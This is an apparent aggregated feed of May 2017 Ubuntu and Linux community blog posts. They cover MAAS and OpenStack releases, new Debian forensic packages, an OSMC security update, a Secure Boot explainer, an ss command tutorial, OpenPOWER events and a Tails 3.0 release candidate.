May 25, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Andres Rodriguez: MAAS 2.2.0 Released!

I’m happy to announce that MAAS 2.2.0 (final) has now been released, and it introduces quite a few exciting features:

  • MAAS Pods – Ability to dynamically create a machine on demand. This is reflected in MAAS’ support for Intel Rack Scale Design.
  • Hardware Testing
  • DHCP Relay Support
  • Unmanaged Subnets
  • Switch discovery and deployment on Facebook’s Wedge 40 & 100.
  • Various improvements and minor features.
  • MAAS Client Library
  • Intel Rack Scale Design support.

For more information, please read the release notes, available here.

MAAS 2.2.0 is currently available in the following MAAS team PPA.
Please note that MAAS 2.2 will replace the MAAS 2.1 series, which will go out of support. We are holding MAAS 2.2 in the above PPA for a week, to give users enough notice that it will replace the 2.1 series. In the following weeks, MAAS 2.2 will be backported into Ubuntu Xenial.

25 May, 2017 01:47PM

hackergotchi for Grml developers

Grml developers

Michael Prokop: The #newinstretch game: new forensic packages in Debian/stretch

Repeating what I did for the last Debian releases with the #newinwheezy and #newinjessie games, it’s time for the #newinstretch game:

Debian/stretch AKA Debian 9.0 will include a bunch of packages for people interested in digital forensics. The following packages, maintained within the Debian Forensics team, are new in the Debian/stretch release as compared to Debian/jessie (ignoring jessie-backports):

  • bruteforce-salted-openssl: try to find the passphrase for files encrypted with OpenSSL
  • cewl: custom word list generator
  • dfdatetime/python-dfdatetime: Digital Forensics date and time library
  • dfvfs/python-dfvfs: Digital Forensics Virtual File System
  • dfwinreg: Digital Forensics Windows Registry library
  • dislocker: read/write encrypted BitLocker volumes
  • forensics-all: Debian Forensics Environment – essential components (metapackage)
  • forensics-colorize: show differences between files using color graphics
  • forensics-extra: Forensics Environment – extra console components (metapackage)
  • hashdeep: recursively compute hashsums or piecewise hashings
  • hashrat: hashing tool supporting several hashes and recursivity
  • libesedb(-utils): Extensible Storage Engine DB access library
  • libevt(-utils): Windows Event Log (EVT) format access library
  • libevtx(-utils): Windows XML Event Log format access library
  • libfsntfs(-utils): NTFS access library
  • libfvde(-utils): FileVault Drive Encryption access library
  • libfwnt: Windows NT data type library
  • libfwsi: Windows Shell Item format access library
  • liblnk(-utils): Windows Shortcut File format access library
  • libmsiecf(-utils): Microsoft Internet Explorer Cache File access library
  • libolecf(-utils): OLE2 Compound File format access library
  • libqcow(-utils): QEMU Copy-On-Write image format access library
  • libregf(-utils): Windows NT Registry File (REGF) format access library
  • libscca(-utils): Windows Prefetch File access library
  • libsigscan(-utils): binary signature scanning library
  • libsmdev(-utils): storage media device access library
  • libsmraw(-utils): split RAW image format access library
  • libvhdi(-utils): Virtual Hard Disk image format access library
  • libvmdk(-utils): VMWare Virtual Disk format access library
  • libvshadow(-utils): Volume Shadow Snapshot format access library
  • libvslvm(-utils): Linux LVM volume system format access library
  • plaso: super timeline all the things
  • pompem: Exploit and Vulnerability Finder
  • pytsk/python-tsk: Python Bindings for The Sleuth Kit
  • rekall(-core): memory analysis and incident response framework
  • unhide.rb: Forensic tool to find processes hidden by rootkits (was already present in wheezy but missing in jessie, available via jessie-backports though)
  • winregfs: Windows registry FUSE filesystem
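
As a taste of the baseline-and-audit workflow that hashdeep (above) automates — with recursion and piecewise hashing on top — here is a minimal sketch using plain coreutils; the evidence directory and file are made up for the example:

```shell
# Create some sample material to baseline (placeholder data).
mkdir -p evidence
echo "sample data" > evidence/file.txt

# Record a baseline of every file's SHA-256 hash.
find evidence -type f -exec sha256sum {} + > baseline.txt

# Later, verify that nothing has changed; prints "evidence/file.txt: OK".
sha256sum -c baseline.txt
```

hashdeep -r does the recursive hashing in one step, and its audit mode can also flag files that were added or removed, which a plain checksum list cannot.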

Join the #newinstretch game and present packages and features which are new in Debian/stretch.

25 May, 2017 07:48AM

hackergotchi for OSMC


OSMC Security Update for OSMC 2017.04-1 and earlier

Platforms affected:

  • OSMC for Raspberry Pi (all models)
  • OSMC for Apple TV
  • OSMC for Vero (all models)

A vulnerability [1] which could allow remote code execution when downloading subtitles from a remote server has been identified in Kodi. This vulnerability is considered critical.

This vulnerability has been fixed in Kodi and we have now included this in OSMC for all supported platforms.

We recommend you update your device immediately. This can be done by going to My OSMC -> Updates -> Check for Updates. After updating, your system should report OSMC 2017.04-2 as the version in My OSMC.

Although OSMC has a monthly update cycle, OSMC makes critical bug fixes and fixes for security vulnerabilities immediately available. You can learn more about OSMC's update cycle and about keeping your system up to date here.

We plan to release our May update this Sunday, with a variety of performance improvements, feature improvements and bug fixes. However, we did not want to wait until then to release an important security fix.

OSMC would like to thank the Check Point Research Team for responsible disclosure of the vulnerability.

[1] CVE-2016-2118

25 May, 2017 01:00AM by Sam Nazarko

May 24, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Mathieu Trudel: An overview of UEFI Secure Boot on Ubuntu

Secure Boot is here

Ubuntu has now supported UEFI booting and Secure Boot for long enough that it is available, and reasonably up to date, on all supported releases. Here is how Secure Boot works.

An overview

I'm including a diagram here; I know it's a little complicated, so I will also explain how things happen (it can be clicked to get to the full size image).

In all cases, booting a system in UEFI mode loads UEFI firmware, which typically contains pre-loaded keys (at least, on x86). These keys are usually those from Microsoft, so that Windows can load its own bootloader and verify it, as well as those from the computer manufacturer. The firmware doesn't, by itself, know anything special about how to boot the system -- that information comes from NVRAM (or some similar memory that survives a reboot) by way of a few variables: BootOrder, which specifies what order to boot things in, and the BootEntry#### variables (hex numbers), each of which contains the path to an EFI image to load, a disk, or some other method of starting the computer (such as booting into the Setup tool for that firmware). If no BootEntry variable listed in BootOrder gets the system booting, nothing happens. Systems will usually at least include a path to a disk as a permanent or default BootEntry. Shim relies on that, or on a distro, to load in the first place.
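
You can inspect these variables on a running Linux system with efibootmgr; a small sketch (it assumes the efibootmgr package is installed, and only shows anything interesting when the machine was actually booted in UEFI mode):

```shell
# List BootOrder, BootCurrent and the BootEntry#### variables.
if [ -d /sys/firmware/efi ] && command -v efibootmgr >/dev/null 2>&1; then
    efibootmgr -v    # -v also prints the EFI image path behind each entry
else
    echo "Not booted in UEFI mode (or efibootmgr missing); nothing to show"
fi
```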

Once we actually find shim and boot it, it will try to validate the signature of the next piece in the puzzle: grub2, MokManager, or fallback, depending on the state of shim's own variables in NVRAM; more on this later.

In the usual scenario, shim will validate the grub2 image successfully, then grub2 itself will try to load the kernel or chainload another EFI binary, after attempting to validate the signatures on these images by way of asking shim to check the signature.


Shim is just a very simple layer that holds on to keys outside of those installed by default on the system (since those normally can't be changed outside of Setup Mode, and require a few steps to do so). It knows how to load grub2 in the normal case; how to load MokManager if policy changes need to be applied (such as disabling signature validation or adding new keys); and how to load the fallback binary, which can re-create BootEntry variables in case the firmware isn't able to handle them. I will expand on MokManager and fallback in a future blog post.

Your diagram says shim is signed by Microsoft, what's up with that?

Indeed, shim is an EFI binary that is signed by Microsoft as we ship it in Ubuntu. Other distributions do the same. This is required because the firmware on most systems already contains Microsoft certificates (pre-loaded in the factory), and it would be impractical to have different shims for each manufacturer of hardware. All EFI binaries can be easily re-signed anyway; we just do things like this to make it as easy as possible for the largest number of people.

One thing this means is that uploads of shim require a lot of effort and testing. Fortunately, since it is used by other distributions too, it is a well-tested piece of code. There is even now a community process to handle review of submissions for signature by Microsoft, in an effort to catch anything outlandish as quickly and as early as possible.

Why reboot once a policy change is made or boot entries are rebuilt?

All of this happens through changes in firmware variables. Rebooting makes sure we can properly take into account changes in the firmware variables, and possibly carry on with other "backlogged" actions that need to happen (for instance, rebuilding BootEntry variables first, and then loading MokManager to add a new signing key before we can load a new grub2 image you signed yourself).


grub2 is not a new piece of the boot process in any way; it's been around for a long while. The difference from booting in BIOS mode is that in UEFI we install a UEFI binary version of grub2. The software is the same, just packaged slightly differently (I may outline the UEFI binary format at some point in the future). It also goes through some code paths that are specific to UEFI, such as checking whether we've booted through shim, and if so, asking it to validate signatures. If not, we can still validate signatures, but we would have to do so using the UEFI protocol itself, which is limited to allowing signatures by keys included in the firmware, as explained earlier -- mostly just the Microsoft signatures.

grub2 in UEFI otherwise works just like it would elsewhere: it tries to find its grub.cfg configuration file, and follows its instructions to boot the kernel and load the initramfs.

When Secure Boot is enabled, loading the kernel normally requires that the kernel itself is signed. The kernels we install in Ubuntu are signed by Canonical, just like grub2 is, and shim knows about the signing key and can validate these signatures.

At the time of this writing, if the kernel isn't signed or is signed by a key that isn't known, grub2 will fall back to loading the kernel as a normal binary (as in, not signed), outside of BootServices (a special mode we're in while booting the system, which the kernel normally exits early on as it loads). Exiting BootServices means some special features of the firmware are not available to anything that runs afterwards, so while things may have been loaded in UEFI mode, they will not have access to everything in the firmware. If the kernel is signed correctly, then grub2 leaves the ExitBootServices call to be done by the kernel.

Very soon, we will stop allowing unsigned kernels (or kernels signed by unknown keys) to be loaded in Ubuntu. This is work in progress. This change will not affect most users, only those who build their own kernels. In that case, they will still be able to load kernels by making sure they are signed by some key (such as their own; I will cover signing things in my next blog entry), and importing that key into shim (a step you only need to do once).

The kernel

In UEFI, the kernel enforces that the modules it loads are properly signed. This means that those who need to build their own custom modules, or use DKMS modules (virtualbox, r8168, bbswitch, etc.), need to take extra steps to let the modules load properly.

In order to make this as easy as possible for people, for now we've opted to let users disable Secure Boot validation in shim via a semi-automatic process. Shim is still verified by the system firmware, but any piece following it that asks shim to validate something will get an affirmative response (i.e. things are valid, even if not signed or signed by an unknown key). grub2 will happily load your kernel, and your kernel will be happy to load custom modules. This is obviously not a perfectly secure solution, more of a temporary measure to allow things to carry on as they did before. In the future, we'll replace this with a wizard-type tool to let users sign their own modules easily. For now, signing binaries and modules is a manual process (as above, I will expand on it in a future blog entry).
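
For the curious, the manual process has a broad shape already: generate your own key pair, enroll the public half through shim (this is what MokManager is for), and sign your modules with the private half. A hedged sketch — the key subject, file names, and module name are placeholders, and the enrollment and signing steps are shown commented out since they need a real UEFI system and matching kernel headers:

```shell
# 1. Generate a signing key pair; shim wants the certificate in DER form.
openssl req -new -x509 -newkey rsa:2048 -nodes -days 36500 \
    -subj "/CN=My module signing key/" \
    -keyout MOK.priv -outform DER -out MOK.der

# 2. Queue the certificate for enrollment; MokManager completes it on next boot:
#sudo mokutil --import MOK.der

# 3. Sign a module with the kernel's sign-file helper (path varies per kernel):
#/usr/src/linux-headers-$(uname -r)/scripts/sign-file sha256 MOK.priv MOK.der my_module.ko
```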

Shim validation

If you were using DKMS packages and feel you'd really prefer to have shim validate everything, you can re-enable validation (but be aware that if your system requires those drivers, they will not load, and your system may be unusable, or at least whatever needs the driver will not work):
sudo update-secureboot-policy --enable
If nothing happens, it's because you already have shim validation enabled: nothing has required that it be disabled. If things aren't as they should be (for instance, Secure Boot is not enabled on the system), the command will tell you.
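
To see where you stand before toggling anything, you can also query the Secure Boot state directly; a sketch, assuming the mokutil package is available:

```shell
# Report whether Secure Boot is currently enforced.
if [ -d /sys/firmware/efi ] && command -v mokutil >/dev/null 2>&1; then
    mokutil --sb-state
else
    echo "Legacy BIOS boot (or mokutil not installed); Secure Boot does not apply"
fi
```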

And although we certainly don't recommend it, you can disable shim validation yourself with much the same command (see --help). There is an example of using update-secureboot-policy here.

24 May, 2017 08:07PM by Mathieu Trudel-Lapierre

Ubuntu Insights: Redefining the Developer Event

By Randall Ross, Ubuntu Evangelist

We’ve all been to “those other” developer events: Sitting in a room watching a succession of never-ending slide presentations. Engagement with the audience, if any, is minimal. We leave with some tips and tools that we might be able to put into practice, but frankly, we attended because we were supposed to. The highlight was actually the opportunity to connect with industry contacts.

Key members of the OpenPOWER Foundation envisioned something completely different in their quest to create the perfect developer event, something that has never been done before: What if developers at a developer event actually spent their time developing?

The OpenPOWER Foundation is an open technical membership organization that enables its member companies to provide customized, innovative solutions based on POWER CPU processors and system platforms that encourage data centers to rethink their approach to technology. The Foundation found that ISVs needed support and encouragement to develop OpenPOWER-based solutions and take advantage of other OpenPOWER Ready components. The demand for OpenPOWER solutions has been growing, and ISVs needed a place to get started.

To solve this challenge, The OpenPOWER Foundation created the first ever Developer Congress, a hands-on event that will take place May 22-25 in San Francisco. The Congress will focus on all aspects of full stack solutions — software, hardware, infrastructure, and tooling — and developers will have the opportunity to learn and develop solutions amongst peers in a collaborative and supportive environment.

The Developer Congress will provide ISVs with development, porting, and optimization tools and techniques necessary to utilize multiple technologies, for example: PowerAI, TensorFlow, Chainer, Anaconda, GPU, FPGA, CAPI, POWER, and OpenBMC. Experts in the latest hot technologies such as deep learning, machine learning, artificial intelligence, databases and analytics, and cloud will be on hand to provide one-on-one advice as needed.

As Event Co-Chair, I had an idea for a different type of event. One where developers are treated as “heroes” (because they are — they are the creators of solutions). My Event Co-Chair Greg Phillips, OpenPOWER Content Marketing Manager at IBM, envisioned an event where developers will bring their laptops and get their hands dirty, working under the tutelage of technical experts to create accelerated solutions.

The OpenPOWER Developer Congress is designed to provide a forum that encourages learning from peers and networking with industry thought leaders. Its format emphasises collaboration with partners to find complementary technologies, and provides on-site mentoring through liaisons assigned to help developers get the most out of their experience.

Support from the OpenPOWER Foundation doesn’t end with the Developer Congress. The OpenPOWER Foundation is dedicated to providing its members with ongoing support in the form of information, access to developer tools and software labs across the globe, and assets for developing on OpenPOWER.

The OpenPOWER Foundation is committed to making an investment in the Developer Congress to provide an expert-rich environment that allows attendees to walk away three days later with new skills, new tools, and new relationships. As Thomas Edison said, “Opportunity is missed by most people because it is dressed in overalls and looks like work.” So developers, come get your hands dirty.

Learn more about the OpenPOWER Developer Congress.

About the author

Randall Ross leads the OpenPOWER Ambassadors, and is a prominent Ubuntu community member. He hails from Vancouver BC, where he leads one of the largest groups of Ubuntu enthusiasts and contributors in the world.

24 May, 2017 12:59PM

Mathieu Trudel: ss: another way to get socket statistics

In my last blog post I mentioned ss, another tool that comes with the iproute2 package and allows you to query statistics about sockets. It does much the same thing as netstat, with the added benefit that it is typically a little bit faster, and shorter to type.

Just running ss by default will display much the same thing as netstat, and it can similarly be passed options to limit the output to just what you want. For instance:

$ ss -t
State       Recv-Q Send-Q       Local Address:Port                        Peer Address:Port              
ESTAB       0      0                               
ESTAB       0      0                              
ESTAB       0      0             

ss -t shows just TCP connections. ss -u can be used to show UDP connections, -l will show only listening ports, and things can be further filtered to just the information you want.
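
The switches combine as you'd expect; a few more examples (what they print naturally depends on what the machine is doing at the time):

```shell
# Listening TCP sockets, with numeric ports instead of service names:
ss -tln

# Count established TCP connections, skipping the header line:
ss -t state established | tail -n +2 | wc -l

# Summary counters for all socket types:
ss -s
```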

I have not tested all the possible options, but you can even forcibly close sockets with -K.

One place where ss really shines though is in its filtering capabilities. Let's list all connections with a source port of 22 (ssh):

$ ss state all sport = :ssh
Netid State      Recv-Q Send-Q     Local Address:Port                      Peer Address:Port              
tcp   LISTEN     0      128                    *:ssh                                  *:*                  
tcp   ESTAB      0      0                          
tcp   LISTEN     0      128                   :::ssh                                 :::*

And if I want to show only connected sockets (everything but listening or closed):

$ ss state connected sport = :ssh
Netid State      Recv-Q Send-Q     Local Address:Port                      Peer Address:Port              
tcp   ESTAB      0      0             

Similarly, you can have it list all connections to a specific host or range; in this case, using the subnet, which apparently belongs to Google:

$ ss state all dst
Netid State      Recv-Q Send-Q     Local Address:Port                      Peer Address:Port              
tcp   ESTAB      0      0                       
tcp   ESTAB      0      0                        
tcp   ESTAB      0      0

This is very much the same syntax as for iptables, so if you're familiar with that already, it will be quite easy to pick up. You can also install the iproute2-doc package and look in /usr/share/doc/iproute2-doc/ss.html for the full documentation.
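
For completeness, here is the destination filter with a concrete subnet spelled out; I'm using 192.0.2.0/24 (a range reserved for documentation) purely as a stand-in for whatever network you care about:

```shell
# All sockets whose peer address falls inside the given subnet:
ss state all dst 192.0.2.0/24

# Filters compose with port expressions too, iptables-style:
ss state established '( dport = :https or sport = :https )'
```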

Try it for yourself! You'll see how well it works. If anything, I'm glad for the fewer characters this makes me type.

24 May, 2017 12:54AM by Mathieu Trudel-Lapierre

May 23, 2017

Ubuntu Insights: Hacking Through Machine Learning at the OpenPOWER Developer Congress

By Sumit Gupta, Vice President, IBM Cognitive Systems

10 years ago, every CEO leaned over to his or her CIO and CTO and said, “we got to figure out big data.” Five years ago, they leaned over and said, “we got to figure out cloud.” This year, every CEO is asking their team to figure out “AI” or artificial intelligence.

IBM laid out an accelerated computing future several years ago as part of our OpenPOWER initiative. This accelerated computing architecture has now become the foundation of modern AI and machine learning workloads such as deep learning. Deep learning is so compute-intensive that, despite using several GPUs in a single server, one run of deep learning software can take days, if not weeks, to complete.

The OpenPOWER architecture thrives on this kind of compute intensity. The POWER processor has much higher compute density than x86 CPUs (there are up to 192 virtual cores per CPU socket in Power8). This density per core, combined with high-speed accelerator interfaces like NVLINK and CAPI that optimize GPU pairing, provides an exponential performance benefit. And the broad OpenPOWER Linux ecosystem, with 300+ members, means that you can run these high-performance POWER-based systems in your existing data center either on-prem or from your favorite POWER cloud provider at costs that are comparable to legacy x86 architectures.

Take a Hack at the Machine Learning Work Group

The recently formed OpenPOWER Machine Learning Work Group gathers experts in the field to focus on the challenges that machine learning developers are continuously facing. Participants identify use cases, define requirements, and collaborate on solution architecture optimisations. By gathering in a workgroup with a laser focus, people from diverse organisations can better understand and engineer solutions that address similar needs and pain points.

The OpenPOWER Foundation pursues technical solutions using POWER architecture from a variety of member-run work groups. The Machine Learning Work Group is a great example of how hardware and software can be leveraged and optimized across solutions that span the OpenPOWER ecosystem.

Accelerate Your Machine Learning Solution at the Developer Congress

This spring, the OpenPOWER Foundation will host the OpenPOWER Developer Congress, a “get your hands dirty” event on May 22-25 in San Francisco. This unique event provides developers the opportunity to create and advance OpenPOWER-based solutions by taking advantage of on-site mentoring, learning from peers, and networking with developers, technical experts, and industry thought leaders. If you are a developer working on Machine Learning solutions that employ the POWER architecture, this event is for you.

The Congress is focused on full stack solutions — software, firmware, hardware infrastructure, and tooling. It’s a hands-on opportunity to ideate, learn, and develop solutions in a collaborative and supportive environment. At the end of the Congress, you will have a significant head start on developing new solutions that utilize OpenPOWER technologies and incorporate OpenPOWER Ready products.

There has never been another event like this one. It’s a developer conference devoted to developing, not sitting through slideware presentations or sales pitches. Industry experts from the top companies that are innovating in deep learning, machine learning, and artificial intelligence will be on hand for networking, mentoring, and providing advice.

A Developer Congress Agenda Specific to Machine Learning

The OpenPOWER Developer Congress agenda addresses a variety of Machine Learning topics. For example, you can participate in hands-on VisionBrain training, learning a new model and generating the API for image classification, using your own family pictures to train the model. The current agenda includes:

• VisionBrain: Deep Learning Development Platform for Computer Vision
• GPU Programming Training, including OpenACC and CUDA
• Inference System for Deep Learning
• Intro to Machine Learning / Deep Learning
• Develop / Port / Optimize on Power Systems and GPUs
• Advanced Optimization
• Spark on Power for Data Science
• Openstack and Database as a Service
• OpenBMC

Bring Your Laptop and Your Best Ideas

The OpenPOWER Developer Congress will take place May 22-25 in San Francisco. The event will provide ISVs with development, porting, and optimization tools and techniques necessary to utilize multiple technologies, for example: PowerAI, TensorFlow, Chainer, Anaconda, GPU, FPGA, CAPI, POWER, and OpenBMC. So bring your laptop and preferred development tools and prepare to get your hands dirty!

About the author

Sumit Gupta is Vice President, IBM Cognitive Systems, where he leads the product and business strategy for HPC, AI, and Analytics. Sumit joined IBM two years ago from NVIDIA, where he led the GPU accelerator business.

23 May, 2017 09:31AM

Marco Trevisan (Treviño): Ubuntu goes GNOME, theming stays. Let’s test (and tune) it!

Hi guys! Again… Long time, no see you :-).

As you surely know, in the past weeks Ubuntu took the hard decision of stopping the development of Unity desktop environment, focusing again in shipping GNOME as default DE, and joining the upstream efforts.

While, on a personal note, after more than 6 years of involvement in Unity development this is a little heartbreaking, I also think that, given the situation, this is the right decision, and I’m quite excited to be able to work even closer with the whole opensource community!

Most of the aspects of the future Ubuntu desktop have yet to be defined, and I guess you know that there’s a survey going on; I encourage you to participate in order to make your voice count…

One important aspect of this, is the visual appearance, and the Ubuntu Desktop team has decided that the default themes for Ubuntu 17.10 will continue to be the ones you always loved! Right now some work is being done to make sure Ambiance and Radiance look and work good in GNOME Shell.

In the past days I’ve released a new version of ‘light-themes‘ to fix several theming problems in GNOME Shell.

This is already quite an improvement, but we can’t fix bugs we don’t know about… So this is where you can help make Ubuntu better!

Get Started

If you haven’t already, here’s how I recommend you get started:

  • Install the latest Ubuntu 17.10 daily image (unless you’re going wild and trying this on 17.04).
  • After installing it, install gnome-shell.
  • Install gnome-tweak-tool if you want an easy way to change themes.
  • On the login screen, switch your session to GNOME and log in.

Report Bugs

Run this command to report bugs with Ambiance or Radiance:

ubuntu-bug light-themes

Attach a screenshot to the Launchpad issue.

Other info

Ubuntu’s default icon theme is ubuntu-mono-dark (or -light if you switch to Radiance) but most of Ubuntu’s customized icons are provided by humanity-icon-theme.

Helping with Themes development

If you want to help with the theming itself, you’re very welcome. Gtk themes are nowadays using CSS, so I’m pretty sure that any Web designer out there can help with them (these are the supported properties).

All you have to do is simply use the Gtk Inspector, which can be launched from any Gtk3 app, write some CSS rules, and see how they get applied on the fly. Once you’re happy with your solution, you can just create a merge proposal (MP) for the Ubuntu Themes.

Let’s keep Ubuntu looking Ubuntu!

PS: thanks to Jeremy Bicha for the help in this post.

23 May, 2017 05:20AM

Aaron Honeycutt: Current Layout: Kubuntu 17.10 – 5/22/17

I’ve been running Artful aka 17.10 on my laptop for maybe a month now with no real issues, and that’s thanks to the awesome Kubuntu developers we have and our testers!


My current layout has Latte Dock running with a normal panel (yes, a bit Mac-y, I know). I had to build Latte Dock myself in Launchpad[1], so if you want to use it on 17.10, it’s there with the normal PPA/testing warning; I also have it built for 17.04 if anyone wants that as well[2]. I’m also running the new Qt music player Babe-Qt.

I also have the Uptime widget and a launcher widget in the Latte Dock, as it can hold widgets just like a normal panel. Oh, and the wallpaper is from the awesome game Firewatch (it’s on Linux!).


23 May, 2017 03:40AM

May 22, 2017

Adam Stokes: conjure-up dev summary for week 20


This week we concentrated on polishing up our region and credentials selection capabilities.

Initially, we wanted people deploying big software as fast as possible, without it turning into a "choose your own adventure" book. This has been hugely successful, as it minimized the time and effort to get to that end result of a usable Kubernetes or OpenStack.

Now fast forward a few months, and feature requests were coming in wanting to expand on this basic flow of installing big software. Our first request was to add the ability to specify regions where this software would live; that feature is complete and is known as region selections:

Region Selections

Region selection is supported both in Juju as a Service (JAAS) and with a self-hosted controller.


In this example we are using JAAS to deploy Canonical Distribution of Kubernetes to the us-east-2 region in AWS:


conjure-up will already know what regions are available and will prompt you with that list:


Finally, input your credentials, and off it goes to build a fully usable Kubernetes cluster in AWS.


The credentials view leads us to our second completed feature. Multiple user credentials are supported for all the various clouds, and previously conjure-up tried to do the right thing if an existing credential for a cloud was found. Again, in the interest of getting you up and running as fast as possible, conjure-up would re-use any credentials it found for the cloud in use. This worked well initially; however, as usage increased, so did the need to choose from a list of existing credentials or create new ones. That feature work has been completed and will be available in conjure-up 2.2.

Credential Selection

This screen shows you a list of existing credentials that were created for AWS or gives you the option of creating additional ones:


Trying out the latest

As always we keep our edge releases current with the latest from our code. If you want to help test out these new features simply run:

sudo snap install conjure-up --classic --edge  

That's all for this week, check back next week for more conjure-up news!

22 May, 2017 04:19PM

James Page: Ubuntu OpenStack Dev Summary – 22nd May 2017

Welcome to the first ever Ubuntu OpenStack development summary!

This summary is intended to be a regular communication of activities and plans happening in and around Ubuntu OpenStack, covering but not limited to the distribution and deployment of OpenStack on Ubuntu.

If there is something that you would like to see covered in future summaries, or you have general feedback on content please feel free to reach out to me (jamespage on Freenode IRC) or any of the OpenStack Engineering team at Canonical!

OpenStack Distribution

Stable Releases

Ceph 10.2.7 for Xenial, Yakkety, Zesty and Trusty-Mitaka UCA.

Open vSwitch updates (2.5.2 and 2.6.1) for Xenial and Yakkety, plus associated UCA pockets.

Point releases for Horizon (9.1.2) and Keystone (9.3.0) for Xenial and Trusty-Mitaka UCA.

And the current set of OpenStack Newton point releases have just entered testing:

Development Release

OpenStack Pike b1 is available in Xenial-Pike UCA (working through proposed testing in Artful).

Open vSwitch 2.7.0 is available in Artful and Xenial-Pike UCA.

Expect some focus on development previews for Ceph Luminous (the next stable release) for Artful and the Xenial-Pike UCA in the next month.

OpenStack Snaps

Progress on producing snap packages for OpenStack components continues; snaps for glance, keystone, nova, neutron and nova-hypervisor are available in the snap store in the edge channel – for example:

sudo snap install --edge --classic keystone

Snaps are currently Ocata aligned; once the team have a set of snaps that we’re all comfortable are a good base, we’ll be working towards publication of snaps across tracks for OpenStack Ocata and OpenStack Pike as well as expanding the scope of projects covered with snap packages.

The edge channel for each track will contain the tip of the associated branch for each OpenStack project, with the beta, candidate and release channels being reserved for released versions. These three channels will be used to drive the CI process for validation of snap updates. This should result in an experience something like:

sudo snap install --classic --channel=ocata/stable keystone


sudo snap install --classic --channel=pike/edge keystone

As the snaps mature, the team will be focusing on enabling deployment of OpenStack using snaps in the OpenStack Charms (which will support CI/CD testing) and migration from deb based installs to snap based installs.

Nova LXD

Support for different Cinder block device backends for Nova-LXD has landed into the driver (and the supporting os-brick library), allowing Ceph Cinder storage backends to be used with LXD containers; this is available in the Pike development release only.

Work on support for new LXD features to allow multiple storage backends to be used is currently in-flight, allowing the driver to use dedicated storage for its LXD instances alongside any use of LXD via other tools on the same servers.

OpenStack Charms

6 monthly release cycle

The OpenStack Charms project is moving to a 6 monthly release cadence (rather than the 3 month cadence we’ve followed for the last few years); this reflects the reduced rate of new features across OpenStack and the charms, and the improved process for backporting fixes to the stable charm set between releases. The next charm release will be in August, aligned with the release of OpenStack Pike and the Xenial Pike UCA.

If you have bugs that you’d like to see backported to the current stable charm set, please tag them with the ‘stable-backport’ tag (and they will pop-up in the right place in Launchpad) – you can see the current stable bug pipeline here.

Ubuntu Artful and OpenStack Pike Support

Required changes into the OpenStack Charms to support deployment of Ubuntu Artful (the current development release) and OpenStack Pike are landing into the development branches for all charms, alongside the release of Pike b1 into Artful and the Xenial-Pike UCA.

You can consume these charms (as always) via the ~openstack-charmers-next team, for example:

juju deploy cs:~openstack-charmers-next/keystone

IRC (and meetings)

You can participate in the OpenStack charm development and discussion by joining the #openstack-charms channel on Freenode IRC; we also have a weekly development meeting in #openstack-meeting-4 at either 1000 UTC (odd weeks) or 1700 UTC (even weeks) – see for more details.


22 May, 2017 11:00AM

May 21, 2017

Costales: Ubuntu y otras hierbas S01E02: GNOME3 y UBPorts [podcast] [spanish]

Segundo capítulo del podcast Ubuntu y otras hierbas.

En esta ocasión:
Charlaremos sobre estos temas:
  • Migración a GNOME 3
  • UBPorts mantendrá Unity y Ubuntu Phone
El podcast está disponible para escuchar en:

Podcast en Youtube

Links relacionados al podcast:
Banda sonora del podcast bajo licencia CC BY-NC 4.0.
Vídeo de Marius en la Ubucon sobre UBPorts.

Todos los capítulos del podcast 'Ubuntu y otras hierbas' disponibles aquí.

21 May, 2017 11:50AM by Marcos Costales

hackergotchi for Tails


Call for testing: 3.0~rc1

You can help Tails! The first release candidate for the upcoming version 3.0 is out. We are very excited and cannot wait to hear what you think about it :)

What's new in 3.0~rc1?

Tails 3.0 will be the first version of Tails based on Debian 9 (Stretch). As such, it upgrades essentially all included software.

Changes since Tails 3.0~beta4 include:

  • Important security fixes!

  • Upgrade to current Debian 9 (Stretch).

  • Upgrade tor to

  • Upgrade Tor Browser to 7.0a4.

  • Migrate from Icedove to Thunderbird (only cosmetic).

Technical details of all the changes are listed in the Changelog.

How to test Tails 3.0~rc1?

We will provide security updates for Tails 3.0~rc1, just like we do for stable versions of Tails.

But keep in mind that this is a test image. We tested that it is not broken in obvious ways, but it might still contain undiscovered issues.

But test wildly!

If you find anything that is not working as it should, please report to us on

Bonus points if you first check if it is a known issue of this release or a longstanding known issue.

Get Tails 3.0~rc1

An automatic upgrade is available from 3.0~beta4 to 3.0~rc1.

If you cannot do an automatic upgrade, you can install 3.0~rc1 by following our usual installation instructions, skipping the Download and verify step.

Tails 3.0~rc1 ISO image OpenPGP signature
Tails 3.0~rc1 torrent

Known issues in 3.0~rc1

  • The documentation has only been partially updated so far.

  • The graphical interface fails to start on some Intel graphics adapters. If this happens to you:

    1. Add the xorg-driver=intel option in the boot menu.
    2. If this fixes the problem, send us the output of the following commands:

      lspci -v
      lspci -mn

      … so we get the identifier of your graphics adapter and can have this fix applied automatically in the next Tails 3.0 pre-release.

    3. If this does not fix the problem, try Troubleshooting Mode and report the problem to us. Include the exact model of your Intel graphics adapter.
  • There is no Read-Only feature for the persistent volume anymore; it is not clear yet whether it will be re-introduced in time for Tails 3.0 final (#12093).

  • The persistent Tor Browser bookmarks feature is broken if you enable it for the first time in Tails 3.0~rc1; any persistent bookmarks from before will still work.

    You can workaround this as follows, after you start Tails the first time with Browser bookmarks persistence enabled:

    1. Start Tor Browser and let it load
    2. Close Tor Browser
    3. Run this in a Terminal:

      cp /home/amnesia/.tor-browser/profile.default/places.sqlite \
      rm /home/amnesia/.tor-browser/profile.default/places.sqlite*
      ln -s /home/amnesia/.mozilla/firefox/bookmarks/places.sqlite \
  • Thunderbird email client fails to load for some users. You can fix this by creating a file called .migrated in the folder of your Thunderbird profile. To do so, run this command in a Terminal:

    touch /home/amnesia/.thunderbird/profile.default/.migrated
  • Open tickets for Tails 3.0~rc1

  • Open tickets for Tails 3.0

  • Longstanding known issues

What's coming up?

We will likely publish the first release candidate for Tails 3.0 around May 19.

Tails 3.0 is scheduled for June 13.

Have a look at our roadmap to see where we are heading to.

We need your help and there are many ways to contribute to Tails (donating is only one of them). Come talk to us!

21 May, 2017 10:34AM

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: Pi Zero as a Serial Gadget

I just got a new Raspberry Pi Zero W (the wireless version) and didn’t feel like hooking it up to a monitor and keyboard to get started. I really just wanted a serial console for starters. Rather than solder in a header, I wanted to be really lazy, so decided to use the USB OTG support of the Pi Zero to provide a console over USB. It’s pretty straightforward, actually.

Install Raspbian on MicroSD

